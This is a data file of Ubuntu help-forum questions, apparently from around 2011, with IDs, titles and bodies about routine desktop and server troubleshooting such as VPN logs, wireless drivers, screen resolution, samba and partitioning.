45347	device id in ubuntu	i am using ubuntu 11.04 on my laptop.i want to make the the touchpad disable.for that i need the device id.so can any one tell me how to get the device id using ubuntu ?
45349	how to extract files to another directory using 'tar ' command ?	i think tar archive.tar /users/mylocation will work . but it does n't . how can i do that ?
45352	vpn pptp connection fails	i am trying to connect to a pptp vpn on my ubuntu 10.10 computer but it seems to fail . i have tried successfully to connect to the vpn on a os x machine and it did work . i connect using the networkmanager applet and the vpn seems to think that i am connected for a while before it closes down again and tells me that the connection fails . when i look in my /var/log/syslog this is what i find : clio networkmanager [ 1208 ] : < info > starting vpn service 'org.freedesktop.networkmanager.pptp ' ... clio networkmanager [ 1208 ] : < info > vpn service 'org.freedesktop.networkmanager.pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 3415 clio networkmanager [ 1208 ] : < info > vpn service 'org.freedesktop.networkmanager.pptp ' appeared , activating connections clio networkmanager [ 1208 ] : < info > vpn plugin state changed : 1 clio networkmanager [ 1208 ] : < info > vpn plugin state changed : 3 clio networkmanager [ 1208 ] : < info > vpn connection 'anonine ' ( connect ) reply received . clio pppd [ 3417 ] : plugin /usr/lib/pppd/2.4.5//nm-pptp-pppd-plugin.so loaded . clio pppd [ 3417 ] : pppd 2.4.5 started by root , uid 0 clio networkmanager [ 1208 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) clio networkmanager [ 1208 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . clio modem-manager : ( net/ppp0 ) : could not get port 's parent device clio pppd [ 3417 ] : using interface ppp0 clio pppd [ 3417 ] : connect : ppp0 < -- > /dev/pts/2 clio pptp [ 3420 ] : nm-pptp-service-3415 log [ main : pptp.c:276 ] : the synchronous pptp option is not activated clio pptp [ 3431 ] : nm-pptp-service-3415 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request ' clio pptp [ 3431 ] : nm-pptp-service-3415 log [ ctrlp_disp : pptp_ctrl.c:738 ] : received start control connection reply clio pptp [ 3431 ] : nm-pptp-service-3415 log [ ctrlp_disp : pptp_ctrl.c:772 ] : client connection established . clio pptp [ 3431 ] : nm-pptp-service-3415 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request ' clio pptp [ 3431 ] : nm-pptp-service-3415 log [ ctrlp_disp : pptp_ctrl.c:857 ] : received outgoing call reply . clio pptp [ 3431 ] : nm-pptp-service-3415 log [ ctrlp_disp : pptp_ctrl.c:896 ] : outgoing call established ( call id 0 , peer 's call id 29301 ) . clio pppd [ 3417 ] : chap authentication succeeded clio pppd [ 3417 ] : mppe 128-bit stateless compression enabled clio pppd [ 3417 ] : can not determine ethernet address for proxy arp clio pppd [ 3417 ] : local ip address [ an ip adress ] clio pppd [ 3417 ] : remote ip address [ an ip adress ] clio pppd [ 3417 ] : primary dns address [ an ip adress ] clio pppd [ 3417 ] : secondary dns address [ an ip adress ] clio networkmanager [ 1208 ] : < info > vpn connection 'anonine ' ( ip config get ) reply received . clio networkmanager [ 1208 ] : < info > vpn gateway : [ an ip adress ] clio networkmanager [ 1208 ] : < info > tunnel device : ppp0 clio networkmanager [ 1208 ] : < info > internal ip4 address : [ an ip adress ] clio networkmanager [ 1208 ] : < info > internal ip4 prefix : 32 clio networkmanager [ 1208 ] : < info > internal ip4 point-to-point address : [ an ip adress ] clio networkmanager [ 1208 ] : < info > maximum segment size ( mss ) : 0 clio networkmanager [ 1208 ] : < info > internal ip4 dns : [ an ip adress ] clio networkmanager [ 1208 ] : < info > internal ip4 dns : [ an ip adress ] clio networkmanager [ 1208 ] : < info > dns domain : ' ( none ) ' clio networkmanager [ 1208 ] : < info > vpn connection 'anonine ' ( ip config get ) complete . clio networkmanager [ 1208 ] : < info > policy set 'anonine ' ( ppp0 ) as default for ipv4 routing and dns . clio networkmanager [ 1208 ] : < info > vpn plugin state changed : 4 clio nm-dispatcher.action : script '/etc/networkmanager/dispatcher.d/01ifupdown ' exited with error status 1 . thus it seems to be able to connect to the vpn but encounters some sort of problem when invoking the script : clio nm-dispatcher.action : script '/etc/networkmanager/dispatcher.d/01ifupdown ' exited with error status 1 . anyone have any idea on how to fix this ?
45357	how to scan for analog cable channels on a dvb-t usb tuner ?	i have bought aver media tv tuner h83 ( aka avertv volar video capture usb h830d ) the dvb-t function works perfectly after the driver is installed , and can be viewed and scanned with me-tv , kaffine , and used with channel.conf on vlc and smplayer . the digital over-the-air tv quality is decent . but i ca n't figure out how to get analog cable working on ubuntu . the tuner comes with a coaxial adaptor . it can scan and watch analog cable just fine when using windows . while that 's great , i do n't want to use windows . i have tried w_scan -ft -c tw ( i am in taiwan ) . i am not sure if i used it right , but i got the message below : dvb aerial vsb us/ca , dvb-t tw frontend_type dvb-t , channellist 1 output format vdr-1.6 info : using dvb adapter auto detection . /dev/dvb/adapter0/frontend0 - > dvb-t `` af9033 dvb-t frontend '' : good : - ) using dvb-t frontend ( adapter /dev/dvb/adapter0/frontend0 ) -_-_-_-_ getting frontend capabilities-_-_-_-_ using dvb api 5.1 frontend af9033 dvb-t frontend supports inversion_auto qam_auto transmission_mode_auto guard_interval_auto hierarchy_auto fec_auto -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ scanning 6mhz frequencies ... 57000 : ( time : 00:04 ) 63000 : ( time : 00:06 ) 69000 : ( time : 00:09 ) 79000 : ( time : 00:11 ) 85000 : ( time : 00:14 ) 177000 : ( time : 00:16 ) ... 803000 : ( time : 02:51 ) error : sorry - i could n't get any working frequency/transponder nothing to scan ! ! am i using the w_scan wrong for my purpose ? i have also tried tvtime , but also did n't work . this is the error message i get for using tvtime : running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/myid/.tvtime/tvtime.xml xvoutput : no xvideo port found which supports yuy2 images . *** tvtime requires hardware yuy2 overlay support from your video card *** driver . if you are using an older nvidia card ( tnt2 ) , then *** this capability is only available with their binary drivers . *** for some ati cards , this feature may be found in the experimental *** gatos drivers : http : //gatos.souceforge.net/ *** if unsure , please check with your distribution to see if your *** x driver supports hardware overlay surfaces . i have a notebook with ati radeon display card inside . what am i doing wrong ? please help me get rid of windows . thanks !
45359	unexpected logout caused by xorg segmentation fault	unexpected logout happened on my 11.04 ubuntu , found a segmentation fault message under /var/log/xorg.0.log.old under inspection . anyone can point out where should i look for . backtrace : [ 5559.541 ] 0 : /usr/bin/x ( xorg_backtrace+0x26 ) [ 0x4a2626 ] [ 5559.541 ] 1 : /usr/bin/x ( 0x400000+0x6219a ) [ 0x46219a ] [ 5559.541 ] 2 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f409e7e4000+0xfc60 ) [ 0x7f409e7f3c60 ] [ 5559.541 ] 3 : /usr/lib/xorg/modules/extensions/librecord.so ( 0x7f409c199000+0x2920 ) [ 0x7f409c19b920 ] [ 5559.541 ] 4 : /usr/bin/x ( _callcallbacks+0x34 ) [ 0x432af4 ] [ 5559.542 ] 5 : /usr/bin/x ( writetoclient+0x21a ) [ 0x461c9a ] [ 5559.542 ] 6 : /usr/lib/xorg/modules/extensions/libdri2.so ( procdri2waitmscreply+0x52 ) [ 0x7f409bb80d82 ] [ 5559.542 ] 7 : /usr/lib/xorg/modules/extensions/libdri2.so ( dri2waitmsccomplete+0x59 ) [ 0x7f409bb7f479 ] [ 5559.542 ] 8 : /usr/lib/xorg/modules/drivers/intel_drv.so ( 0x7f409b92c000+0x25030 ) [ 0x7f409b951030 ] [ 5559.542 ] 9 : /lib/x86_64-linux-gnu/libdrm.so.2 ( drmhandleevent+0x108 ) [ 0x7f409bd8a478 ] [ 5559.542 ] 10 : /usr/bin/x ( wakeuphandler+0x4b ) [ 0x4322fb ] [ 5559.542 ] 11 : /usr/bin/x ( waitforsomething+0x1b6 ) [ 0x45c786 ] [ 5559.542 ] 12 : /usr/bin/x ( 0x400000+0x2e032 ) [ 0x42e032 ] [ 5559.542 ] 13 : /usr/bin/x ( 0x400000+0x21a7e ) [ 0x421a7e ] [ 5559.542 ] 14 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xff ) [ 0x7f409d72deff ] [ 5559.542 ] 15 : /usr/bin/x ( 0x400000+0x21629 ) [ 0x421629 ] [ 5559.542 ] segmentation fault at address 0x7f4095e5c010 [ 5559.542 ] caught signal 11 ( segmentation fault ) . server aborting [ 5559.542 ]
45362	how should i specify command-line arguments for mongodb ?	mongodb has instructed me to change its command-line arguments : rest is not enabled . use -- rest to turn on . but this is all i know how to do : sudo service mongodb start where should i apply this configuration change ?
45363	how to run a program for a fixed period of time ?	i am looking for a method built-in to ubuntu that will allow me to run a script or program or whatever for a fixed period of time . i found a program that does this in a way i like , but the package is unavailable for ubuntu . in any case , i was hoping for something built-in . the only thing i can think of is to get the current time and set a cron job 30 minutes from 'now ' that will kill the program . i was hoping there was a way to do this without setting up a script , but if i need to - it wont be the end of the world . after the 30 minute interval i would like to put my laptop in a sleep mode , but this can be separate from the timer thing . thanks in advance .
45365	gnome3 shows old icons for network manager	i just upgraded to gnome3 ppa in ubuntu 11.04 . every thing is running smoothly after the upgrade , except the network manager icon , which is the old gnome 's icons and the ubuntu network manager . its driving me insane . i want the latest gnome network manager icons and the interface . is there any way to fix that ? here are the screenshots
45371	have to click at the date to enable the other applets	the problem i am having is that sometimes i have to click at the date applet to enable the access to the others . for example , if i want to adjust the volume i do these : left click at date > move the mouse to the sound icon > adjust the volume is this supposed to happen or it 's a bug ? thank you !
45372	how do i set the resolution on a dell mini 1010 to it 's native resolution ?	i have installed ubuntu 11.04 ( natty ) on my dell mini 1010 . the installation worked fine , however i can not change the screen resolution to the netbook 's native resolution . i always get 800x600 , which is not the native resolution . is there a way to get more than the 800x600 option in the monitors drop down list ?
45373	is disk utility reliable ?	i 'm using ubuntu 11.04 . disk utility is reporting i have a bad sector on my hard drive . is this reliable ? i 'm skeptical that it 's reporting accurately because when i googled `` ubuntu disk utility bad sectors , '' it brought me to this bug : https : //bugs.launchpad.net/ubuntu/+source/libatasmart/+bug/438136 ? comments=all i 've scanned the drive with the manufacturer 's tool ( seagate seatools ) and it did n't report any errors i scanned the drive with a couple other tools and they did n't report any errors running fdisk and ntfsfix did n't find anything ( other than ntfsinfo saying that my windows volume was `` scheduled for check '' ) disk utility is reporting some crazy numbers in other places : the read error rate is over 60 million ( yet still green ) , the seek error rate is over 150 billion ( yet still green ) , hardware ecc recovered is over 84 million ( again , green ) . see these screenshots : edit : wikipedia 's entry for smart has this to say for each of these attributes : `` the raw value has different structure for different vendors and is often not meaningful as a decimal number . '' having said all that , my windows partition has become unbootable ( ntoskrnl.exe missing or corrupted , etc . ) multiple times over the last several years , and other than the fact that windows is relatively unreliable , bad sectors would explain why it keeps messing up . what 's the best way to determine whether or not there really is anything wrong with the drive ?
45374	stop terminal to auto-put forward slash in front of $ home	i am running 11.04 . every time i tried to a command such as mv fliea $ home/ < somedir > / terminal automatically put `` \ '' in front of $ home when i hit the 'tab ' key for autocomplete mv fliea \ $ home/ < somedir > / it 's incredibly annoying , how can i fix this .
45376	gcc headers on ubuntu	i was wondering , if there was a go to place to look for c headers , and how to get them on ubuntu , often times a quick google search gets me the apt-get package . i was wondering if it possible look up any header *.h file and get the required package . in this particular case i am look for mbstring.h i am not totally sure if this is the appropriate place for this . if so move as needed . thanks .
45377	how to install ubuntu on windows xp	i want to install ubuntu 10.10 version but i do n't about that one . sir is the internet required to install ubuntu . sir please tell me in detail and can i get boot disc freely from you by application
45379	`` ca n't find disk drive '' during ubuntu karmic server install	i 'm trying to install karmic server and before the partitioning step it tells me that it ca n't detect the disk drive , and asks me to give it a driver name from a huge list . the problem is that i do n't know what driver to use or how to find it . i have a maverick desktop cd , and when i boot into that i am able to view the drive and see the unallocated space in gparted . unfortunately there are some requirements on the system which prevent me from using anything but karmic on it right now , so a newer version is n't an option . is there a way i can get karmic on this other than using the karmic installer ? the hard drive is ata wdc wd1600bjkt-7 . here 's the output of lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:19.0 ethernet controller : intel corporation 82577lm gigabit network connection ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 )
45380	modify the number of entries in the list to choose from for bookmarking a site in firefox	i am wondering if it is possible to change the number of entries in the list which appears when in firefox you right click on a tab and choose `` add to bookmarks '' . that 's because i use to categorize a lot of bookmarks and the standard choice of 5 entries is too small . of course the idea is to not have to click on `` choose '' further down following the menu .
45383	how to i do install db2 odbc ?	i have been trying , with no success , to install a ibm db2 odbc driver so that my php server can connect to a database . i 've tried installing the db2_connect and get all sorts of problems , i tried install i access for linux and the rpm did not install right nor did using alien breed any useful results . i 've also tried the db2 runtime v8.1 , no success . if i attempt to run the rpm it claims i need dependencies that i ca n't find in apt-get . yum is also not very helpful as it appears i do n't have any repositories installed or lists ... running the simple rpm gives me this result in terminal : # rpm -ivh iseriesaccess-7.1.0-1.0.x86_64.rpm rpm : rpm should not be used directly install rpm packages , use alien instead ! rpm : however assuming you know what you are doing ... error : failed dependencies : /bin/ln is needed by iseriesaccess-7.1.0-1.0.x86_64 /sbin/ldconfig is needed by iseriesaccess-7.1.0-1.0.x86_64 /bin/rm is needed by iseriesaccess-7.1.0-1.0.x86_64 /bin/sh is needed by iseriesaccess-7.1.0-1.0.x86_64 libc.so.6 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libc.so.6 ( glibc_2.2.5 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libc.so.6 ( glibc_2.3 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libdl.so.2 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libdl.so.2 ( glibc_2.2.5 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libgcc_s.so.1 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libm.so.6 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libm.so.6 ( glibc_2.2.5 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libodbcinst.so.1 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libodbc.so.1 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libpthread.so.0 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libpthread.so.0 ( glibc_2.2.5 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libpthread.so.0 ( glibc_2.3.2 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 librt.so.1 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 librt.so.1 ( glibc_2.2.5 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libstdc++.so.6 ( cxxabi_1.3 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 libstdc++.so.6 ( glibcxx_3.4 ) ( 64bit ) is needed by iseriesaccess-7.1.0-1.0.x86_64 using alien and running the dkpg gives me thes headaque : $ alien iseriesaccess-7.1.0-1.0.x86_64.rpm -- scripts # dpkg -i iseriesaccess_7.1.0-2_amd64.deb ( reading database ... 127664 files and directories currently installed . ) preparing to replace iseriesaccess 7.1.0-2 ( using iseriesaccess_7.1.0-2_amd64.deb ) ... unpacking replacement iseriesaccess ... post uninstall processing for iseriesaccess 1.0 ... upgrade /var/lib/dpkg/info/iseriesaccess.postrm : line 8 : [ : upgrade : integer expression expected setting up iseriesaccess ( 7.1.0-2 ) ... post install processing for iseriesaccess 1.0 ... configure iseries access odbc driver has been deleted ( if it existed at all ) because its usage count became zero odbcinst : driver installed . usage count increased to 1 . target directory is /etc odbcinst : driver installed . usage count increased to 3 . target directory is /etc processing triggers for libc-bin ... ldconfig deferred processing now taking place so it seems the files installed right , well my odbc driver shows up but db2cli.ini is no where to be found . so several questions . is there a better alternative to connect php to db2 , say an ubuntu package i can just install ? can someone direct me to the steps that makes my ubuntu server works well with the rpm so i can build my db2 instance ? also remember i 'm connection to an i series remotely . i 'm not using the db2 express c thing , even if i did try it to get the db2 php functions to work . and i do n't have zend but i think i have every other package on the ubuntu repositories . help , thank you !
45385	ipv6-enabled bridging without ipv6 addresses on the interfaces	i 'm in the process of rebuilding my ibf ( invisible bridging firewall ) as ubuntu 10.04.2 lts . in the past i have dealt with ipv6 by way of disabling it entirely . this time around i want to leave it enabled and filter it with ip6tables , etc . all my config seems fine , except i can not seem to discover a working method for getting the 'fe80 ' addresses off of my bridge-interface-cards . it might be understandable for br0 to get such an address , but under no circumstances would i want anything speaking on any layer higher than '2 ' directly to eth0 or eth1 . things i have tried thus far include : 1 ) specifying 'inet6 manual ' entries in 'interfaces' 2 ) specifying 'inet6 static ' and 'address : :' 3 ) sysctl.conf '0 ' for various inet6 settings found via google 4 ) 'post-up echo 0 > ' as above nothing seems to work . if i run a 'ip -6 addr del ' command , i can get it to go away , but that ( as you likely know ) does n't last and it does n't survive a reboot . what i want is the equivalent to ipv4 's '0.0.0.0 ' addressing - a non-functional , yet not unconfigured address . ideas ?
45393	why libreoffice 3.4 rc 1 missing a shared library that is present on the system ?	i 'm trying to use libreoffice 3.4 rc 1 on my system , and at first it was working fine . however when i tried to save a file in writer , it kept failing , so i tried to restart , but found it would no longer launch . it turns out i 've been hit by a bug that was supposedly fixed in rc 1 , and according to comments , i should n't be seeing this problem , so i 'm guessing it might be ubuntu specific ( just guessing ) . the reason for this questions is n't so much to get it working ( though that would be great ) , but rather to help me rule out the possible causes ( such as ubuntu not being compatible with something along the way ) . below this the commandline output : warning : failed to launch javaldx - java may not fuction correctly /opt/libreoffice3.4/program/soffice.bin : error while loading shared libraries : libjvmfwk.so.3 : can not open shared object file : no such file or directory
45395	how to check which smtp client i have installed ?	how do i check which smtp client i have installed ? and how do i configure it ?
45396	how can i modify the live cd to start into a live session ( `` try ubuntu '' ) directly ?	i am creating a custom ubuntu live cd built on 10.04.2 . by default it boots up to a screen where you have two options , try without installation and install . this is the step i would like to avoid : i would rather have it boot into the start up options screen , the one you can enter by hitting a key when first starting ubuntu or just go straight to the desktop . i would like to head here by default :
45398	how do i install the gnome do plugin for banshee ?	how do i install the gnome do plugin for banshee in natty ? it 's not in the plugin list and i have googled half an hour trying to find a way to install it , but most info i found was outdated .
45399	about polkit-agent-helper ( or polkit )	on ubuntu some apps call /usr/lib/policykit-1/polkit-agent-helper-1 when it needs to execute `` privileged processes '' . this is inconsistent with gksu force grab behavior where the whole screen is disabled unless user cancels . is there any way the former could be made to have a force grab to make it more consistent with gksu ?
45415	how to change screen resolution of thinkpad x300 ?	i think that the maximum resolution i can get is 8192x8192 . could you tell me how can i safely increase the screen resolution ? actually i wanted to try with xrandr command , but i am afraid that it may create some problems as there is not much support for the video drivers ( intel corporation mobile gm965/gl960 ) of my machine . i am not sure though . the output of xrandr command on my thinkpad x300 running ubuntu 11.04 is as follows . $ xrandr screen 0 : minimum 320 x 200 , current 1440 x 900 , maximum 8192 x 8192 lvds1 connected 1440x900+0+0 ( normal left inverted right x axis y axis ) 287mm x 180mm 1440x900 60.0*+ 59.9 50.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) some more information : $ uname -a linux user-thinkpad 2.6.38-8-generic-pae # 42-ubuntu smp mon apr 11 05:17:09 utc 2011 i686 i686 i386 gnu/linux
45416	is there a list of wireless adapters that work on ubuntu with no hassle ?	i 've got ubuntu 10.04 installed , and i 've just spent 2 hours trying to get my linksys wusb54gc wireless usb adapter to work with no luck . i 've tried the ndiswrapper , pulling the .inf files off my installation cd and a dozen other suggestions from the ubuntu forums . i want a wireless adapter ( usb or pci ) that just works without all this hassle . is there a compatible list somewhere , or can someone recommend one ? i do n't care if i have to upgrade to 10.10 or 11.04 either .
45420	ubuntu one music playlist does n't work	am i the only one that is not able to make playlists with ubuntu one on android ? everytime i make one , it says network error . i have tried it on wifi and 3g with no luck as well as restarting my phone . any solutions ?
45421	ubuntu on macbook pro	i 've never supported apple in any way , but they do make incredible hardware . as i 've just purchased and got working a nice apple wireless keyboard ( bought second-hand ! ) , i 'm curious about the possibility of buying a second-hand macbook and installing ubuntu on it . what , of what 's important , is n't working ? notably , i do flash player development from time to time , so i do at the very least need to get a 32-bit debug player installed . ( i usually run 64-bit , so i 'm familiar with having to tweak things to get it all working properly ) i 'd also need to be able to play dvds with css , run google chrome , etc . is it fairly similar in capabilities as a non-apple computer as far as what i can use ? it seems that there 's a different architecture used , namely powerpc , and i do n't know what this means to me as an end-user . can anyone recommend me for doing this or against it ?
45422	broadcom sta wireless driver fails to install	i 'm setting up a dell m4400 precision , and on previous installations i 've merely installed the broadcom sta wireless driver from the `` additional drivers '' app . however with 11.04 , i get this error : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log . which contains : 2011-05-26 19:18:33,726 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2011-05-26 19:18:33,743 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted wifi works fine on windows , and had worked fine in ubuntu 8.10-10.10 . i 've done a fair amount of searching and tried quite a few fixes , all of them failed . edit : after uncommenting the blacklist file i got the following errors in the var/log/jockey.log : 2011-06-01 12:49:13,283 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x9adfaec 2011-06-01 12:49:15,395 debug : reading modalias file /lib/modules/2.6.38-8-generic-pae/modules.alias 2011-06-01 12:49:15,521 debug : reading modalias file /usr/share/jockey/modaliases/b43 2011-06-01 12:49:15,526 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2011-06-01 12:49:15,554 warning : could not open driverdb cache /var/cache/jockey/driverdb-openprintingdriverdb.cache : [ errno 2 ] no such file or directory : '/var/cache/jockey/driverdb-openprintingdriverdb.cache' 2011-06-01 12:49:15,567 debug : loading custom handler /usr/share/jockey/handlers/broadcom_wl.py 2011-06-01 12:49:15,627 warning : modinfo for module wl failed : error : modinfo : could not find module wl
45426	how to restore deleted panel on desktop	i had two panels . one panel contains `` applications '' , `` places '' , `` system '' , time and date , gnome network manager icon , and sound icon . the other panel contains different workspaces , the windows of aplications that have been open within the workspaces , show desktop icon and trash bin icon . i accidentally delete the panel that contains `` applications '' and etc . i was wondering how i can restore that panel ? thanks and regards ! my os is ubuntu 10.10 .
45427	recommended partitioning scheme considering upgrades , dual/triple booting , multi-distro , and software settings	yes , this has been asked numerous times here , and ive carefully read all the related questions . but very few focus on some of the issues that concerns me the most . so , given we now have a new ubuntu 11.04 and new linux mint 11 recently released , its time for some upgrades ! : d i have mint 10 installed , and would like to upgrade it to 11 , and also install ubuntu 11.01 natty side-by-side in a separate partition . here is my current setup : 10 gb ntfs win xp ( gaming performance ) 30 gb ntfs win 7 ( rarely used , im considering changing to virtual box instead ) 30 gb ext4 / linux mint 10 ( my main os ) 5 gb swap ( i have 4gb ram ) and on sdb : a bazilion gb ntfs /dados ( docs , music , videos , pics , isos , and all os-neutral data ) that means /home currently holds basically only config files in the ~/.hidden folders . my questions are : if my data is already in a separate partition , would a separate /home partition be any useful ? why and how ? how would different ( but similar ) distros ( mint 10 , 11 , and ubuntu natty ) behave when sharing the same /home partition ? what about config files ? would , for instance , firefox 3.6 ( from mint 10/ubuntu maverick ) play nice with firefox 4 if they both use the same ~/.firefox config folder ? what about `` system '' setings like ~/.gconf , ~/.gnome2 , ~/.config , etc ? wouldnt it be a nasty mess if a separate , shared /home is used ? how that should be dealed with ? same goes for /boot : if each os mounts it , wont they also change/upgrade them ? since each uses a different grub version , wont that mess it up ? any chances of version mismatch between the bootsector image and the /boot contents due to different oses mounting / updating it ? what about username / user id / stored passwords ? would all distros behave correctly ? i know the first user created in ubuntu have some unique tweaks ( id=1000 , tweaked permisions , etc ) . how would it be if ubuntu is presented with a separate ( and already existing ) /home with a user at install ? would vault , for instance , works ? im the only user of my computer , so multi-user flexibilty is not an great issue ( but it would be nice if possible ) given that , i would like some opinions , warnings , or any input that might help me to set up a good partition scheme . this is not an objective question , im looking for subjective suggestions and things to consider . moderators feel free to change to community . words on how ~/.config files work for different software versions in a shared and/or upgraded enviroment are greatly apreciated . thanks !
45431	how to put an animation sprite on the desktop ?	i want a small running bicycle ( maybe an animation gif ) on the desktop , to remind me focus on work and work hard , can i ? it can be embedded in a small window , but it 's better to remove the surrounding window border . it 's even better if it supports gif-89a animation , so i can customize it whatever i want .
45432	i 'm unable to play song from musicindiaonline.com in 64bit ver	i have 64bit version of ubuntu . i 'm unable to play songs from the site musicindiaonline.com . one solution is to install real player but real player works only on 32bit . what is the solution to this . some plugins for real player , mplayer etc and all are installed in firefox but of no use . its the latest version 11.04
45434	why is sysrq doc not where specified by `man vlock` ?	man vlock says to look in /usr/src/linux/documentation/sysrq.txt . this file is n't there ( though it 's available online ) . why ?
45441	will my logitech 9000 pro webcam ( still ) work with ubuntu ?	it used to work - maybe around version 8.04 or earlier . now all the video apps i used to use just tell me that they ca n't find a video device . even with xscreensavers configured to grab video images , it tells me there 's no video device at /dev/video0 . previously i did n't have to do anything to make it work . apparently that 's changed ? thanks in advance ! aaron
45444	how to troubleshoot why i can not connect to samba server	i am trying to connect to a samba server from windows . i configured it accoring to the ubuntu docs for clients & servers using cli . [ homes ] comment = home directories browseable = yes writable = yes create mash = 0755 directory mask = 0755 valid users = % s sudo smbpasswd -a jm sudo smbpasswd -e jm then sudo reload smbd on windows , i did : map network drive \ip_of_server\username connect with different credentials - > entered my ubuntu credentials was prompted for credentials again , without errors ...
45445	what is this executable /usr/bin/bsd-mailx ?	i 'm getting a warning from this executable along with /usr/bin/mail . apparently , the latter is a symbolic link to /etc/alternatives/mail which in turn is a symbolic link to the former . is it part of the official ubuntu package ? and what of these , anybody familiar ? [ 11:22:59 ] checking /dev for suspicious file types [ warning ] [ 11:22:59 ] warning : suspicious file types found in /dev : [ 11:22:59 ] /dev/shm/pulse-shm-3395357841 : data [ 11:22:59 ] /dev/shm/pulse-shm-209100905 : data [ 11:22:59 ] /dev/shm/pulse-shm-1946326073 : data [ 11:22:59 ] /dev/shm/pulse-shm-398300649 : data [ 11:22:59 ] /dev/shm/pulse-shm-1247248499 : data [ 11:22:59 ] /dev/shm/pulse-shm-919341478 : data [ 11:22:59 ] /dev/shm/pulse-shm-3492730495 : data [ 11:22:59 ] /dev/shm/pulse-shm-2387631939 : data [ 11:22:59 ] /dev/shm/mono.1905 : data [ 11:22:59 ] /dev/shm/pulse-shm-2124227282 : data [ 11:22:59 ] /dev/shm/pulse-shm-626708369 : data [ 11:22:59 ] /dev/shm/pulse-shm-135679340 : data [ 11:22:59 ] /dev/shm/pulse-shm-2263796104 : data [ 11:22:59 ] /dev/shm/pulse-shm-2124025764 : data [ 11:22:59 ] /dev/shm/pulse-shm-226259018 : data [ 11:22:59 ] /dev/shm/pulse-shm-1077030235 : data [ 11:23:00 ] checking for hidden files and directories [ warning ] [ 11:23:00 ] warning : hidden directory found : /etc/.java [ 11:23:00 ] warning : hidden directory found : /dev/.udev [ 11:23:00 ] warning : hidden directory found : /dev/.initramfs
45453	my drivers are in the archive manager how do i move it to a place that the video card will reconize it	i suppose to load my matrox g400 drivers ( 4.4.0.tar.gz ) to either update manager , ubuntu software center or synaptic package manager from the archive manager ( i have it there now ) , is the way to load it to a place were my video card can find it or address it .
45461	what is `` gfi webmonitor secure download '' ? and how to disable it ?	please help me to disable it ! it offends me while downloading via web browsers .
45469	how do i add a specific time-server ?	at work i can only connect to a specific ntp time-server . under ubuntu 10.10 i was able to add that server somewhere under time/date settings . now under ubuntu 11.04 i can not find that option anymore . i am sure that there is a config somewhere that i can edit to add the approved server . can you please give me some pointers ? edit : i should probably mention that i use the classic desktop .
45470	installing on virtualbox from a bootable cd	i have an ubuntu bootable installation cd . how to install from the cd to a virtualbox on windows after creating a virtual machine as described here . the link mentions about downloading ubuntu disk image ( iso file ) , but i would like to skip this step as i have a bootable cd already .
45474	troubleshooting a sudden shutdown	yesterday my computer suddenly powered down , without warning or going through the normal shutdown procedure . i know it was n't a powercut because everything else in the house stayed on . this is the first time it has happened , and it turned on again without a hitch ( bar some fsck'ing ) . my question is , where do i begin looking for a reason why . i appreciate it could be hardware , and was hoping someone could lead me in the direction of some logs , etc . that i could use to confirm that it is n't a problem in ubuntu ; or learn a little more about how it happened . thanks .
